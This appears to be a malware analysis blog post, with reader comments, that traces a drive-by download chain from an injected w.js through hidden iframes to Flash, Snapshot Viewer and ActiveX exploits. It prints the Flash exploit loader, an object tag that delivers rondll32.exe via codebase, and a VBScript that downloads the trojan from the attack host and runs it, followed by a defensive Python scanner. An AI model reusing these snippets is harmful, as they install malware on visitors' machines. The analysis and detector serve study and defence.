jjmaobuduo.3322.org/csrss/w.js

A new round of attacks has started.
w.js contains an iframe whose src is http://www.plgou.com/csrss/htm.htm.
htm.htm in turn contains iframes pointing to:

  • <iframe src=flash.htm width=100 height=0></iframe>
  • <iframe src=06014.html width=100 height=0></iframe>
  • <iframe src=yahoo.htm width=100 height=0></iframe>
  • <iframe src=office.htm width=100 height=0></iframe>
  • <iframe src=ksx.htm width=100 height=0></iframe>

flash.htm loads i1.html if the browser is MSIE, otherwise f2.html (presumably for Firefox). Depending on the installed Flash Player version, the matching Flash exploit is retrieved; builds with a revision of 124 or higher receive nothing:

var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
  document.getElementById('flashversion').innerHTML="";
  if(version['rev']==115){
    var so=new SWFObject("./i115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")
  }else if(version['rev']==64){
    var so=new SWFObject("./i64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")
  }else if(version['rev']==47){
    var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")
  }else if(version['rev']==45){
    var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")
  }else if(version['rev']==28){
    var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")
  }else if(version['rev']==16){
    var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")
  }else if(version['rev']>=124){
    if(document.getElementById){document.getElementById('flashversion').innerHTML=""}
  }
}
document.write("")

Interesting content in ksx.htm:
<object classid="clsid:7E0CDEE7-DC80-4F37-9410-790BB5E9270E" codebase="http://www.plgou.com/csrss/rondll32.exe#version=1,0,0,1" width="800" height="191"></object>

An infrequently used CLSID; the trojan (rondll32.exe) is supplied through the codebase attribute.

office.htm contains the Snapshot Viewer exploit.

yahoo.htm exploits a Yahoo Messenger ActiveX control (its GetFile method) to download and run the trojan:

<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "http://www.plgou.com/csrss/rondll32.exe","c:\\msyahoo.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"c:\\msyahoo.exe"
</script>
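As an added example (not code from the original post), a small Python scanner that flags the markers documented above in a captured page: zero-height iframes like those in htm.htm, the two ActiveX CLSIDs from ksx.htm and yahoo.htm, and object tags whose codebase points at an executable. The sample HTML is constructed from the snippets in this post.

```python
import re

# Constructed sample modelled on the htm.htm / ksx.htm / yahoo.htm snippets above,
# plus one ordinary iframe that must not be flagged.
SAMPLE_HTML = """
<iframe src=flash.htm width=100 height=0></iframe>
<iframe src=06014.html width=100 height=0></iframe>
<object classid="clsid:7E0CDEE7-DC80-4F37-9410-790BB5E9270E"
 codebase="http://www.plgou.com/csrss/rondll32.exe#version=1,0,0,1"></object>
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<iframe src=https://example.org/legit width=300 height=200></iframe>
"""

# CLSIDs as they appear in this post, with the post's own characterisation of each.
SUSPECT_CLSIDS = {
    "7E0CDEE7-DC80-4F37-9410-790BB5E9270E": "rarely used control, executable delivered via codebase",
    "24F3EAD6-8B87-4C1A-97DA-71C126BDA08F": "Yahoo Messenger control, GetFile used to drop a file",
}

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
OBJECT_RE = re.compile(r"<object\b([^>]*)>", re.I)
# Attribute values may be double-quoted, single-quoted or bare (as in the post's iframes).
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def parse_attrs(attr_text):
    """Return a lowercase-keyed dict of the attributes inside one tag."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(attr_text)}


def scan(html):
    """Return (kind, detail) findings for the indicators described in the post."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        a = parse_attrs(m.group(1))
        # Hidden frames: the injected iframes all use height=0.
        if a.get("height") == "0" or a.get("width") == "0":
            findings.append(("hidden-iframe", a.get("src", "")))
    for m in OBJECT_RE.finditer(html):
        a = parse_attrs(m.group(1))
        clsid = a.get("classid", "").upper().replace("CLSID:", "")
        if clsid in SUSPECT_CLSIDS:
            findings.append(("suspect-clsid", clsid))
        codebase = a.get("codebase", "")
        # codebase normally names a .cab; an .exe (with or without #version) is the ksx.htm pattern.
        if re.search(r"\.exe(#|$)", codebase, re.I):
            findings.append(("exe-codebase", codebase))
    return findings


if __name__ == "__main__":
    for kind, detail in scan(SAMPLE_HTML):
        print(f"{kind}: {detail}")
```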


4 Responses to “jjmaobuduo.3322.org/csrss/w.js”

  1. Do you have any information about what each of these trojans do?

  2. 06014.html is 06014.htm. This is the hacker's mistake 🙂

  3. the analysis of rondll32.exe is here

  4. rondll32.exe will go out and grab ack.htm.
    ack.htm downloads 4 executables:
    beauty.exe
    sss.exe
    sl.exe
    fengxiang.exe
